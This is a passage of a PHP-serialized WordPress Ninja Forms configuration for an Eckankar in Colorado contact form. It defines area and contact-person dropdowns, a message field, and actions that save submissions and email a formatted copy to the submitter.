Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Northwest\";s:5:\"value\";s:9:\"Northwest\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:7;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:3:\"key\";s:14:\"listselect_170\";s:15:\"container_class\";s:14:\"one-half first\";s:11:\"field_label\";s:15:\"Your Local Area\";s:9:\"field_key\";s:14:\"listselect_170\";}s:2:\"id\";i:216;}i:6;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:7;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:10:\"listselect\";s:5:\"label\";s:43:\"Select The Person You Would Like To Contact\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:9:\"list_type\";s:8:\"dropdown\";s:10:\"multi_size\";s:1:\"5\";s:15:\"list_show_value\";s:1:\"1\";s:4:\"list\";a:0:{}s:21:\"user_info_field_group\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"options\";a:5:{i:0;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";i:0;}i:1;a:10:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:1;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:22:\"Initiator-Pat Lafferty\";s:5:\"value\";s:22:\"initiator-pat-lafferty\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:2;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:30:\"ESA/Initiator-Melony Mont-Eton\";s:5:\"value\";s:30:\"ESA-Initiator-Melony Mont-Eton\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:3;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:24:\"Initiator-Mike Mont-Eton\";s:5:\"value\";s:24:\"Initiator-Mike Mont-Eton\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";i:3;}i:4;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"order\";i:4;s:3:\"new\";s:0:\"\";s:7:\"options\";a:0:{}s:5:\"label\";s:28:\"ESA/Initiator-Kimberly Young\";s:5:\"value\";s:28:\"ESA/Initiator-Kimberly Young\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";s:1:\"1\";}}s:3:\"key\";s:57:\"select_the_person_you_would_like_to_contact_1613166807240\";s:15:\"container_class\";s:8:\"one-half\";s:14:\"drawerDisabled\";b:0;s:11:\"field_label\";s:41:\"Select the person you would like to email\";s:9:\"field_key\";s:14:\"listselect_173\";}s:2:\"id\";i:219;}i:7;a:2:{s:8:\"settings\";a:33:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:8;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"textarea\";s:5:\"label\";s:23:\"Enter Your Message Here\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:13:\"default_value\";s:0:\"\";s:12:\"textarea_rte\";s:1:\"0\";s:14:\"textarea_media\";s:1:\"0\";s:18:\"disable_rte_mobile\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:17:\"calc_auto_include\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:3:\"key\";s:12:\"textarea_174\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:10:\"manual_key\";s:0:\"\";s:11:\"field_label\";s:23:\"Enter Your Message Here\";s:9:\"field_key\";s:12:\"textarea_174\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:220;}i:8;a:2:{s:8:\"settings\";a:12:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:9;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:4:\"HTML\";s:4:\"type\";s:4:\"html\";s:7:\"default\";s:197:\"This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:18:\"html_1663800618371\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";s:3:\"634\";}i:9;a:2:{s:8:\"settings\";a:19:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:10;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:6:\"submit\";s:5:\"label\";s:6:\"Submit\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:16:\"processing_label\";s:10:\"Processing\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:10:\"submit_176\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:6:\"Submit\";s:9:\"field_key\";s:10:\"submit_176\";}s:2:\"id\";i:222;}}s:7:\"actions\";a:4:{i:0;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:44:49\";s:5:\"label\";s:9:\"Save Form\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";}s:2:\"id\";i:77;}i:1;a:2:{s:8:\"settings\";a:28:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:44:49\";s:5:\"label\";s:17:\"Send copy to user\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:9:\"from_name\";s:20:\"Eckankar In Colorado\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:17:\"{field:email_168}\";s:13:\"email_subject\";s:34:\"Loveland Initiators and ESAâs\";s:13:\"email_message\";s:3757:\"<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello {field:textbox_166},</strong></p><br /><br />\r\n<p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website requesting contact with a person on the Parker ECK Leadership Communications team.</p><br /><br />\r\n<p>Here is a copy of the information that you have submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_166}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_167}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_168}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_169}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_170}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166807240}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_174}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p>Your submission is being forwarded to the person that you have selected and you will be contacted soon.</p><br /><br />\r\n<br /><br />\r\nIf you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front 